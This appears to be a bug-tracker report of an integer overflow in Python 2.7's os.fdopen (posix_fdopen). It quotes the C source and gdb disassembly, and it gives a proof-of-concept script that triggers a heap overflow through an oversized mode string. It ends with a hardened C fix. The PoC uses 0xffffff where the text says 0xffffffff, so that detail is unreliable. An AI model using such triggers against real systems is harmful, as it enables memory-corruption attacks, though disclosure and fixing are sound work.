Message267447
I have tested this vulnerability on Python 2.7 and it is absolutely affected :). An integer overflow is produced in the posix_fdopen function. If an attacker sends an fdopen mode value larger than the max integer value (2^32) to fdopen, an integer overflow occurs.
    int fd;
    char *orgmode = "r";
    int bufsize = -1;
    FILE *fp;
    PyObject *f;
    char *mode;
    if (!PyArg_ParseTuple(args, "i|si", &fd, &orgmode, &bufsize))
        return NULL;
    /* Sanitize mode. See fileobject.c */
    mode = PyMem_MALLOC(strlen(orgmode)+3);
    ...
    strcpy(mode, orgmode);
os.fdopen(fd[, mode[, bufsize]])
fo = os.fdopen(fd, "r"*0xffffffff)
0x5e2595 <+86>: mov edi,eax
=> 0x5e2598 <+89>: call 0x416e50 <strlen@plt>
(gdb) print /x $eax
$1 = 0xffffffff
After the "add" instruction does the addition, the overflow occurs:
=> 0x5e259d <+94>: add eax,0x3
(gdb) print /x $eax
$5 = 0x2
Then the memory is allocated and the buffer is copied:
0x5e25a1 <+98>: mov edi,eax
0x5e25a4 <+101>: call 0x48f793 <_PyMem_DebugMalloc>
0x5e25cb <+140>: mov esi,edx
...
0x5e25ce <+143>: mov edi,eax
0x5e25d1 <+146>: call 0x416b80 <strcpy@plt>
Copy buffer:
strcpy(mode, orgmode); <=== overflow
PoC:
#!/usr/bin/python
import os, sys
fd = os.open( "foo.txt", os.O_RDWR|os.O_CREAT )
fo = os.fdopen(fd, "r"*0xffffff)
print "Closed the file successfully!!"
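As an added illustration (not the reporter's code and not the CPython fix), the snippet below reproduces the 32-bit wrap the disassembly shows (0xffffffff + 3 == 2) beside a hardened size computation that checks for overflow in size_t and rejects oversized modes before anything is allocated or copied; MODE_MAX_LEN is a constructed cap chosen for the example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Mirrors the arithmetic in the disassembly: the length sits in a 32-bit
 * register, so strlen(orgmode) == 0xffffffff wraps to 2 after "add eax,0x3",
 * and the following malloc gets a 2-byte buffer for a 4 GiB string. */
uint32_t wrapped_mode_size(uint32_t orglen)
{
    return orglen + 3;   /* 0xffffffff + 3 == 0x2 (mod 2^32) */
}

/* Constructed cap: real fdopen modes are a handful of characters. */
#define MODE_MAX_LEN 16

/* Hardened variant: size computed in size_t, wrap-around detected before
 * the addition, and absurd lengths refused up front. */
bool checked_mode_size(size_t orglen, size_t *out)
{
    if (orglen > SIZE_MAX - 3)   /* orglen + 3 would wrap */
        return false;
    if (orglen > MODE_MAX_LEN)   /* never allocate for a bogus mode */
        return false;
    *out = orglen + 3;
    return true;
}

/* Copies the mode only after the size check passed; the copy is bounded by
 * the size just computed, so the buffer can never be smaller than the data.
 * Returns NULL on rejection or allocation failure; caller frees the result. */
char *copy_mode_checked(const char *orgmode)
{
    size_t need;
    if (!checked_mode_size(strlen(orgmode), &need))
        return NULL;
    char *mode = malloc(need);
    if (mode == NULL)
        return NULL;
    memcpy(mode, orgmode, need - 3);
    mode[need - 3] = '\0';
    return mode;
}
```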